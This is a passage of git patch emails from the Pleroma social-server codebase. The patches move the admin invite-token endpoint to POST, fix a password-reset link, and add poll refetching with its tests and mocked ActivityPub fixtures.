def get_invite_token(conn, params) do
- options = params["invite"] || %{}
- {:ok, invite} = UserInviteToken.create_invite(options)
+ opts = %{}
- conn
- |> json(invite.token)
+ opts =
+ if params["max_use"],
+ do: Map.put(opts, :max_use, params["max_use"]),
+ else: opts
+
+ opts =
+ if params["expires_at"],
+ do: Map.put(opts, :expires_at, params["expires_at"]),
+ else: opts
+
+ {:ok, invite} = UserInviteToken.create_invite(opts)
+
+ json(conn, AccountView.render("invite.json", %{invite: invite}))
end
@doc "Get list of created invites"
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 401133bf3..5779d27d2 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -180,7 +180,7 @@ defmodule Pleroma.Web.Router do
post("/relay", AdminAPIController, :relay_follow)
delete("/relay", AdminAPIController, :relay_unfollow)
- get("/users/invite_token", AdminAPIController, :get_invite_token)
+ post("/users/invite_token", AdminAPIController, :get_invite_token)
get("/users/invites", AdminAPIController, :invites)
post("/users/revoke_invite", AdminAPIController, :revoke_invite)
post("/users/email_invite", AdminAPIController, :email_invite)
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index c497ea098..5f36d42e4 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -574,18 +574,6 @@ test "it returns 500 if `registrations_open` is enabled", %{conn: conn, user: us
end
end
- test "/api/pleroma/admin/users/invite_token" do
- admin = insert(:user, info: %{is_admin: true})
-
- conn =
- build_conn()
- |> assign(:user, admin)
- |> put_req_header("accept", "application/json")
- |> get("/api/pleroma/admin/users/invite_token")
-
- assert conn.status == 200
- end
-
test "/api/pleroma/admin/users/:nickname/password_reset" do
admin = insert(:user, info: %{is_admin: true})
user = insert(:user)
@@ -1064,7 +1052,7 @@ test "PATCH /api/pleroma/admin/users/:nickname/toggle_activation" do
"@#{admin.nickname} deactivated user @#{user.nickname}"
end
- describe "GET /api/pleroma/admin/users/invite_token" do
+ describe "POST /api/pleroma/admin/users/invite_token" do
setup do
admin = insert(:user, info: %{is_admin: true})
@@ -1076,10 +1064,10 @@ test "PATCH /api/pleroma/admin/users/:nickname/toggle_activation" do
end
test "without options", %{conn: conn} do
- conn = get(conn, "/api/pleroma/admin/users/invite_token")
+ conn = post(conn, "/api/pleroma/admin/users/invite_token")
- token = json_response(conn, 200)
- invite = UserInviteToken.find_by_token!(token)
+ invite_json = json_response(conn, 200)
+ invite = UserInviteToken.find_by_token!(invite_json["token"])
refute invite.used
refute invite.expires_at
refute invite.max_use
@@ -1088,12 +1076,12 @@ test "without options", %{conn: conn} do
test "with expires_at", %{conn: conn} do
conn =
- get(conn, "/api/pleroma/admin/users/invite_token", %{
- "invite" => %{"expires_at" => Date.to_string(Date.utc_today())}
+ post(conn, "/api/pleroma/admin/users/invite_token", %{
+ "expires_at" => Date.to_string(Date.utc_today())
})
- token = json_response(conn, 200)
- invite = UserInviteToken.find_by_token!(token)
+ invite_json = json_response(conn, 200)
+ invite = UserInviteToken.find_by_token!(invite_json["token"])
refute invite.used
assert invite.expires_at == Date.utc_today()
@@ -1102,13 +1090,10 @@ test "with expires_at", %{conn: conn} do
end
test "with max_use", %{conn: conn} do
- conn =
- get(conn, "/api/pleroma/admin/users/invite_token", %{
- "invite" => %{"max_use" => 150}
- })
+ conn = post(conn, "/api/pleroma/admin/users/invite_token", %{"max_use" => 150})
- token = json_response(conn, 200)
- invite = UserInviteToken.find_by_token!(token)
+ invite_json = json_response(conn, 200)
+ invite = UserInviteToken.find_by_token!(invite_json["token"])
refute invite.used
refute invite.expires_at
assert invite.max_use == 150
@@ -1117,12 +1102,13 @@ test "with max_use", %{conn: conn} do
test "with max use and expires_at", %{conn: conn} do
conn =
- get(conn, "/api/pleroma/admin/users/invite_token", %{
- "invite" => %{"max_use" => 150, "expires_at" => Date.to_string(Date.utc_today())}
+ post(conn, "/api/pleroma/admin/users/invite_token", %{
+ "max_use" => 150,
+ "expires_at" => Date.to_string(Date.utc_today())
})
- token = json_response(conn, 200)
- invite = UserInviteToken.find_by_token!(token)
+ invite_json = json_response(conn, 200)
+ invite = UserInviteToken.find_by_token!(invite_json["token"])
refute invite.used
assert invite.expires_at == Date.utc_today()
assert invite.max_use == 150
From 2263c8b6b9260bee7dedeaff3d2ce955df12f08b Mon Sep 17 00:00:00 2001
From: Alex S
Date: Fri, 6 Sep 2019 17:20:44 +0300
Subject: [PATCH 118/272] little fixes
---
lib/pleroma/web/admin_api/admin_api_controller.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 41ded7343..d25c21e33 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -400,7 +400,7 @@ def email_invite(%{assigns: %{user: user}} = conn, %{"email" => email} = params)
end
end
- @doc "Get a account registeration invite token (base64 string)"
+ @doc "Get an account registration invite token"
def get_invite_token(conn, params) do
opts = %{}
From 17ff63b3c34e6e70580be98e71b353d1f0684222 Mon Sep 17 00:00:00 2001
From: Alex S
Date: Sat, 7 Sep 2019 08:56:22 +0300
Subject: [PATCH 119/272] docs fix
---
docs/api/admin_api.md | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index a8c75d93f..577f802ac 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -228,10 +228,8 @@ Note: Available `:permission_group` is currently moderator and admin. 404 is ret
- Methods: `POST`
- Params:
- - *optional* `invite` => [
- - *optional* `max_use` (integer)
- - *optional* `expires_at` (date string e.g. "2019-04-07")
- ]
+ - *optional* `max_use` (integer)
+ - *optional* `expires_at` (date string e.g. "2019-04-07")
- Response:
```json
From a18f1e7cd7addf8aee9c56643f4f0531e1c5b5a0 Mon Sep 17 00:00:00 2001
From: Alex S
Date: Fri, 13 Sep 2019 08:07:29 +0300
Subject: [PATCH 120/272] namings
---
docs/api/admin_api.md | 2 +-
lib/pleroma/web/admin_api/admin_api_controller.ex | 4 ++--
lib/pleroma/web/router.ex | 2 +-
3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index 577f802ac..7637fa0d4 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -224,7 +224,7 @@ Note: Available `:permission_group` is currently moderator and admin. 404 is ret
## `/api/pleroma/admin/users/invite_token`
-### Get an account registration invite token
+### Create an account registration invite token
- Methods: `POST`
- Params:
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index d25c21e33..8a8091daa 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -400,8 +400,8 @@ def email_invite(%{assigns: %{user: user}} = conn, %{"email" => email} = params)
end
end
- @doc "Get an account registration invite token"
- def get_invite_token(conn, params) do
+ @doc "Create an account registration invite token"
+ def create_invite_token(conn, params) do
opts = %{}
opts =
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 5779d27d2..b9b85fd67 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -180,7 +180,7 @@ defmodule Pleroma.Web.Router do
post("/relay", AdminAPIController, :relay_follow)
delete("/relay", AdminAPIController, :relay_unfollow)
- post("/users/invite_token", AdminAPIController, :get_invite_token)
+ post("/users/invite_token", AdminAPIController, :create_invite_token)
get("/users/invites", AdminAPIController, :invites)
post("/users/revoke_invite", AdminAPIController, :revoke_invite)
post("/users/email_invite", AdminAPIController, :email_invite)
From 384b7dd40dd484146d267ba4e12f750184365bfc Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Wed, 18 Sep 2019 18:06:49 +0300
Subject: [PATCH 121/272] Fix response
---
lib/pleroma/web/admin_api/admin_api_controller.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 4421b30c8..54ab6e032 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -438,7 +438,7 @@ def get_password_reset(conn, %{"nickname" => nickname}) do
conn
|> json(%{
token: token.token,
- link: "#{protocol}://#{host}/api/pleroma/password_reset/#{token}"
+ link: "#{protocol}://#{host}/api/pleroma/password_reset/#{token.token}"
})
end
From 7ef575d11e46247d1f64dd09d992e532cb8c5c37 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 18:13:21 +0300
Subject: [PATCH 122/272] Initial poll refresh support
Implement refreshing the object with an interval and call the function
when getting the poll.
---
lib/pleroma/object.ex | 18 ++++
lib/pleroma/object/fetcher.ex | 17 +++-
.../controllers/mastodon_api_controller.ex | 2 +-
test/fixtures/tesla_mock/poll_modified.json | 1 +
test/fixtures/tesla_mock/poll_original.json | 1 +
test/fixtures/tesla_mock/rin.json | 1 +
test/object_test.exs | 86 +++++++++++++++++++
test/support/http_request_mock.ex | 4 +
8 files changed, 126 insertions(+), 4 deletions(-)
create mode 100644 test/fixtures/tesla_mock/poll_modified.json
create mode 100644 test/fixtures/tesla_mock/poll_original.json
create mode 100644 test/fixtures/tesla_mock/rin.json
diff --git a/lib/pleroma/object.ex b/lib/pleroma/object.ex
index 5033798ae..640e068e5 100644
--- a/lib/pleroma/object.ex
+++ b/lib/pleroma/object.ex
@@ -38,6 +38,24 @@ def change(struct, params \\ %{}) do
def get_by_id(nil), do: nil
def get_by_id(id), do: Repo.get(Object, id)
+ def get_by_id_and_maybe_refetch(id, opts \\ []) do
+ %{updated_at: updated_at} = object = get_by_id(id)
+
+ if opts[:interval] &&
+ NaiveDateTime.diff(updated_at, NaiveDateTime.utc_now()) > opts[:interval] do
+ case Fetcher.refetch_object(object) do
+ {:ok, %Object{} = object} ->
+ object
+
+ e ->
+ Logger.error("Couldn't refresh #{object.data["id"]}:\n#{inspect(e)}")
+ object
+ end
+ else
+ object
+ end
+ end
+
def get_by_ap_id(nil), do: nil
def get_by_ap_id(ap_id) do
diff --git a/lib/pleroma/object/fetcher.ex b/lib/pleroma/object/fetcher.ex
index c1795ae0f..da1ebd8b3 100644
--- a/lib/pleroma/object/fetcher.ex
+++ b/lib/pleroma/object/fetcher.ex
@@ -7,17 +7,19 @@ defmodule Pleroma.Object.Fetcher do
alias Pleroma.Object
alias Pleroma.Object.Containment
alias Pleroma.Signature
+ alias Pleroma.Repo
alias Pleroma.Web.ActivityPub.InternalFetchActor
alias Pleroma.Web.ActivityPub.Transmogrifier
alias Pleroma.Web.OStatus
require Logger
- defp reinject_object(data) do
+ defp reinject_object(struct, data) do
Logger.debug("Reinjecting object #{data["id"]}")
with data <- Transmogrifier.fix_object(data),
- {:ok, object} <- Object.create(data) do
+ changeset <- Object.change(struct, %{data: data}),
+ {:ok, object} <- Repo.insert_or_update(changeset) do
{:ok, object}
else
e ->
@@ -26,6 +28,15 @@ defp reinject_object(data) do
end
end
+ def refetch_object(%Object{data: %{"id" => id}} = object) do
+ with {:ok, data} <- fetch_and_contain_remote_object_from_id(id),
+ {:ok, object} <- reinject_object(object, data) do
+ {:ok, object}
+ else
+ e -> {:error, e}
+ end
+ end
+
# TODO:
# This will create a Create activity, which we need internally at the moment.
def fetch_object_from_id(id, options \\ []) do
@@ -57,7 +68,7 @@ def fetch_object_from_id(id, options \\ []) do
{:reject, nil}
{:object, data, nil} ->
- reinject_object(data)
+ reinject_object(%Object{}, data)
{:normalize, object = %Object{}} ->
{:ok, object}
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 060137b80..970cfd8db 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -485,7 +485,7 @@ def get_context(%{assigns: %{user: user}} = conn, %{"id" => id}) do
end
def get_poll(%{assigns: %{user: user}} = conn, %{"id" => id}) do
- with %Object{} = object <- Object.get_by_id(id),
+ with %Object{} = object <- Object.get_by_id_and_maybe_refetch(id, interval: 60),
%Activity{} = activity <- Activity.get_create_by_object_ap_id(object.data["id"]),
true <- Visibility.visible_for_user?(activity, user) do
conn
diff --git a/test/fixtures/tesla_mock/poll_modified.json b/test/fixtures/tesla_mock/poll_modified.json
new file mode 100644
index 000000000..1d026b592
--- /dev/null
+++ b/test/fixtures/tesla_mock/poll_modified.json
@@ -0,0 +1 @@
+{"@context":["https://www.w3.org/ns/activitystreams","https://patch.cx/schemas/litepub-0.1.jsonld",{"@language":"und"}],"actor":"https://patch.cx/users/rin","attachment":[],"attributedTo":"https://patch.cx/users/rin","cc":["https://patch.cx/users/rin/followers"],"closed":"2019-09-19T00:32:36.785333","content":"can you vote on this poll?","context":"https://patch.cx/contexts/626ecafd-3377-46c4-b908-3721a4d4373c","conversation":"https://patch.cx/contexts/626ecafd-3377-46c4-b908-3721a4d4373c","id":"https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d","oneOf":[{"name":"yes","replies":{"totalItems":8,"type":"Collection"},"type":"Note"},{"name":"no","replies":{"totalItems":3,"type":"Collection"},"type":"Note"}],"published":"2019-09-18T14:32:36.802152Z","sensitive":false,"summary":"","tag":[],"to":["https://www.w3.org/ns/activitystreams#Public"],"type":"Question"}
\ No newline at end of file
diff --git a/test/fixtures/tesla_mock/poll_original.json b/test/fixtures/tesla_mock/poll_original.json
new file mode 100644
index 000000000..267876b3c
--- /dev/null
+++ b/test/fixtures/tesla_mock/poll_original.json
@@ -0,0 +1 @@
+{"@context":["https://www.w3.org/ns/activitystreams","https://patch.cx/schemas/litepub-0.1.jsonld",{"@language":"und"}],"actor":"https://patch.cx/users/rin","attachment":[],"attributedTo":"https://patch.cx/users/rin","cc":["https://patch.cx/users/rin/followers"],"closed":"2019-09-19T00:32:36.785333","content":"can you vote on this poll?","context":"https://patch.cx/contexts/626ecafd-3377-46c4-b908-3721a4d4373c","conversation":"https://patch.cx/contexts/626ecafd-3377-46c4-b908-3721a4d4373c","id":"https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d","oneOf":[{"name":"yes","replies":{"totalItems":4,"type":"Collection"},"type":"Note"},{"name":"no","replies":{"totalItems":0,"type":"Collection"},"type":"Note"}],"published":"2019-09-18T14:32:36.802152Z","sensitive":false,"summary":"","tag":[],"to":["https://www.w3.org/ns/activitystreams#Public"],"type":"Question"}
\ No newline at end of file
diff --git a/test/fixtures/tesla_mock/rin.json b/test/fixtures/tesla_mock/rin.json
new file mode 100644
index 000000000..2cf623764
--- /dev/null
+++ b/test/fixtures/tesla_mock/rin.json
@@ -0,0 +1 @@
+{"@context":["https://www.w3.org/ns/activitystreams","https://patch.cx/schemas/litepub-0.1.jsonld",{"@language":"und"}],"attachment":[],"endpoints":{"oauthAuthorizationEndpoint":"https://patch.cx/oauth/authorize","oauthRegistrationEndpoint":"https://patch.cx/api/v1/apps","oauthTokenEndpoint":"https://patch.cx/oauth/token","sharedInbox":"https://patch.cx/inbox"},"followers":"https://patch.cx/users/rin/followers","following":"https://patch.cx/users/rin/following","icon":{"type":"Image","url":"https://patch.cx/media/4e914f5b84e4a259a3f6c2d2edc9ab642f2ab05f3e3d9c52c81fc2d984b3d51e.jpg"},"id":"https://patch.cx/users/rin","image":{"type":"Image","url":"https://patch.cx/media/f739efddefeee49c6e67e947c4811fdc911785c16ae43da4c3684051fbf8da6a.jpg?name=f739efddefeee49c6e67e947c4811fdc911785c16ae43da4c3684051fbf8da6a.jpg"},"inbox":"https://patch.cx/users/rin/inbox","manuallyApprovesFollowers":false,"name":"rinpatch","outbox":"https://patch.cx/users/rin/outbox","preferredUsername":"rin","publicKey":{"id":"https://patch.cx/users/rin#main-key","owner":"https://patch.cx/users/rin","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5DLtwGXNZElJyxFGfcVc\nXANhaMadj/iYYQwZjOJTV9QsbtiNBeIK54PJrYuU0/0YIdrvS1iqheX5IwXRhcwa\nhm3ZyLz7XeN9st7FBni4BmZMBtMpxAuYuu5p/jbWy13qAiYOhPreCx0wrWgm/lBD\n9mkgaxIxPooBE0S4ZWEJIDIV1Vft3AWcRUyWW1vIBK0uZzs6GYshbQZB952S0yo4\nFzI1hABGHncH8UvuFauh4EZ8tY7/X5I0pGRnDOcRN1dAht5w5yTA+6r5kebiFQjP\nIzN/eCO/a9Flrj9YGW7HDNtjSOH0A31PLRGlJtJO3yK57dnf5ppyCZGfL4emShQo\ncQIDAQAB\n-----END PUBLIC KEY-----\n\n"},"summary":"your friendly neighborhood pleroma developer
I like cute things and distributed systems, and really hate delete and redrafts","tag":[],"type":"Person","url":"https://patch.cx/users/rin"}
\ No newline at end of file
diff --git a/test/object_test.exs b/test/object_test.exs
index ba96aeea4..72e36316c 100644
--- a/test/object_test.exs
+++ b/test/object_test.exs
@@ -89,4 +89,90 @@ test "does not fetch unknown objects when fetch_remote is false" do
)
end
end
+
+ describe "get_by_id_and_maybe_refetch" do
+ test "refetches if the time since the last refetch is greater than the interval" do
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_original.json")}
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+
+ %Object{} =
+ object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
+
+ assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_modified.json")}
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+
+ updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
+ assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 8
+ assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 3
+ end
+
+ test "returns the old object if refetch fails" do
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_original.json")}
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+
+ %Object{} =
+ object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
+
+ assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ %Tesla.Env{status: 404, body: ""}
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+
+ updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
+ assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+ end
+
+ test "does not refetch if the time since the last refetch is greater than the interval" do
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_original.json")}
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+
+ %Object{} =
+ object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
+
+ assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_modified.json")}
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+
+ updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: 100)
+ assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+ end
+ end
end
diff --git a/test/support/http_request_mock.ex b/test/support/http_request_mock.ex
index 231e7c498..833162a61 100644
--- a/test/support/http_request_mock.ex
+++ b/test/support/http_request_mock.ex
@@ -1004,6 +1004,10 @@ def get("https://skippers-bin.com/users/7v1w1r8ce6", _, _, _) do
{:ok, %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/sjw.json")}}
end
+ def get("https://patch.cx/users/rin", _, _, _) do
+ {:ok, %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/rin.json")}}
+ end
+
def get(url, query, body, headers) do
{:error,
"Mock response not implemented for GET #{inspect(url)}, #{query}, #{inspect(body)}, #{
From 84a40f6f266ea651578b3d641c000a3b762fc9f3 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 18:31:24 +0300
Subject: [PATCH 123/272] Capture log in object refetch tests
---
test/object_test.exs | 25 ++++++++++++++++---------
1 file changed, 16 insertions(+), 9 deletions(-)
diff --git a/test/object_test.exs b/test/object_test.exs
index 72e36316c..25e8d45d4 100644
--- a/test/object_test.exs
+++ b/test/object_test.exs
@@ -4,6 +4,7 @@
defmodule Pleroma.ObjectTest do
use Pleroma.DataCase
+ import ExUnit.CaptureLog
import Pleroma.Factory
import Tesla.Mock
alias Pleroma.Object
@@ -134,17 +135,23 @@ test "returns the old object if refetch fails" do
assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
- mock(fn
- %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
- %Tesla.Env{status: 404, body: ""}
+ assert capture_log(fn ->
+ mock(fn
+ %{
+ method: :get,
+ url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"
+ } ->
+ %Tesla.Env{status: 404, body: ""}
- env ->
- apply(HttpRequestMock, :request, [env])
- end)
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
- updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
- assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 4
- assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+ updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
+ assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+ end) =~
+ "[error] Couldn't refresh https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"
end
test "does not refetch if the time since the last refetch is greater than the interval" do
From a9c700ff1594bbd3c280dd6ac3a8dffa6ea7060b Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 18:52:33 +0300
Subject: [PATCH 124/272] Fix wrong argument order when calling
NaiveDateTime.diff
---
lib/pleroma/object.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/object.ex b/lib/pleroma/object.ex
index 640e068e5..3fa407931 100644
--- a/lib/pleroma/object.ex
+++ b/lib/pleroma/object.ex
@@ -42,7 +42,7 @@ def get_by_id_and_maybe_refetch(id, opts \\ []) do
%{updated_at: updated_at} = object = get_by_id(id)
if opts[:interval] &&
- NaiveDateTime.diff(updated_at, NaiveDateTime.utc_now()) > opts[:interval] do
+ NaiveDateTime.diff(NaiveDateTime.utc_now(), updated_at) > opts[:interval] do
case Fetcher.refetch_object(object) do
{:ok, %Object{} = object} ->
object
From e3f902b3a1330f942ddaf6ff7b108bba8fc3120a Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 19:07:25 +0300
Subject: [PATCH 125/272] Set updated_at even if the object stayed the same
---
lib/pleroma/object/fetcher.ex | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/lib/pleroma/object/fetcher.ex b/lib/pleroma/object/fetcher.ex
index da1ebd8b3..786e31cce 100644
--- a/lib/pleroma/object/fetcher.ex
+++ b/lib/pleroma/object/fetcher.ex
@@ -14,11 +14,20 @@ defmodule Pleroma.Object.Fetcher do
require Logger
+ defp touch_changeset(changeset) do
+ updated_at =
+ NaiveDateTime.utc_now()
+ |> NaiveDateTime.truncate(:second)
+
+ Ecto.Changeset.put_change(changeset, :updated_at, updated_at)
+ end
+
defp reinject_object(struct, data) do
Logger.debug("Reinjecting object #{data["id"]}")
with data <- Transmogrifier.fix_object(data),
changeset <- Object.change(struct, %{data: data}),
+ changeset <- touch_changeset(changeset),
{:ok, object} <- Repo.insert_or_update(changeset) do
{:ok, object}
else
From d32894ae512c1f4cff4d967b89a0772e105d456b Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 19:24:20 +0300
Subject: [PATCH 126/272] Move object internal fields to a constant
---
lib/pleroma/constants.ex | 12 ++++++++++++
lib/pleroma/web/activity_pub/transmogrifier.ex | 10 +---------
2 files changed, 13 insertions(+), 9 deletions(-)
diff --git a/lib/pleroma/constants.ex b/lib/pleroma/constants.ex
index ef1418543..0bf20cdd0 100644
--- a/lib/pleroma/constants.ex
+++ b/lib/pleroma/constants.ex
@@ -6,4 +6,16 @@ defmodule Pleroma.Constants do
use Const
const(as_public, do: "https://www.w3.org/ns/activitystreams#Public")
+
+ const(object_internal_fields,
+ do: [
+ "likes",
+ "like_count",
+ "announcements",
+ "announcement_count",
+ "emoji",
+ "context_id",
+ "deleted_activity_id"
+ ]
+ )
end
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 8461b666e..9d2ddc1cd 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -979,15 +979,7 @@ def prepare_attachments(object) do
defp strip_internal_fields(object) do
object
- |> Map.drop([
- "likes",
- "like_count",
- "announcements",
- "announcement_count",
- "emoji",
- "context_id",
- "deleted_activity_id"
- ])
+ |> Map.drop(Pleroma.Constants.object_internal_fields())
end
defp strip_internal_tags(%{"tag" => tags} = object) do
From eb87a86b5b3999f3e7ee119e839da3bd6d2ed4cf Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 19:53:51 +0300
Subject: [PATCH 127/272] Preserve internal fields when reinjecting
---
lib/pleroma/object/fetcher.ex | 10 ++++
test/object_test.exs | 102 ++++++++++++++++++++--------------
2 files changed, 69 insertions(+), 43 deletions(-)
diff --git a/lib/pleroma/object/fetcher.ex b/lib/pleroma/object/fetcher.ex
index 786e31cce..fecc97c5e 100644
--- a/lib/pleroma/object/fetcher.ex
+++ b/lib/pleroma/object/fetcher.ex
@@ -13,6 +13,7 @@ defmodule Pleroma.Object.Fetcher do
alias Pleroma.Web.OStatus
require Logger
+ require Pleroma.Constants
defp touch_changeset(changeset) do
updated_at =
@@ -22,10 +23,19 @@ defp touch_changeset(changeset) do
Ecto.Changeset.put_change(changeset, :updated_at, updated_at)
end
+ defp maybe_reinject_internal_fields(data, %{data: %{} = old_data}) do
+ internal_fields = Map.take(old_data, Pleroma.Constants.object_internal_fields())
+
+ Map.merge(data, internal_fields)
+ end
+
+ defp maybe_reinject_internal_fields(data, _), do: data
+
defp reinject_object(struct, data) do
Logger.debug("Reinjecting object #{data["id"]}")
with data <- Transmogrifier.fix_object(data),
+ data <- maybe_reinject_internal_fields(data, struct),
changeset <- Object.change(struct, %{data: data}),
changeset <- touch_changeset(changeset),
{:ok, object} <- Repo.insert_or_update(changeset) do
diff --git a/test/object_test.exs b/test/object_test.exs
index 25e8d45d4..3d64fdb49 100644
--- a/test/object_test.exs
+++ b/test/object_test.exs
@@ -7,8 +7,10 @@ defmodule Pleroma.ObjectTest do
import ExUnit.CaptureLog
import Pleroma.Factory
import Tesla.Mock
+ alias Pleroma.Activity
alias Pleroma.Object
alias Pleroma.Repo
+ alias Pleroma.Web.CommonAPI
setup do
mock(fn env -> apply(HttpRequestMock, :request, [env]) end)
@@ -92,7 +94,7 @@ test "does not fetch unknown objects when fetch_remote is false" do
end
describe "get_by_id_and_maybe_refetch" do
- test "refetches if the time since the last refetch is greater than the interval" do
+ setup do
mock(fn
%{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
%Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_original.json")}
@@ -101,34 +103,41 @@ test "refetches if the time since the last refetch is greater than the interval"
apply(HttpRequestMock, :request, [env])
end)
+ mock_modified = fn resp ->
+ mock(fn
+ %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
+ resp
+
+ env ->
+ apply(HttpRequestMock, :request, [env])
+ end)
+ end
+
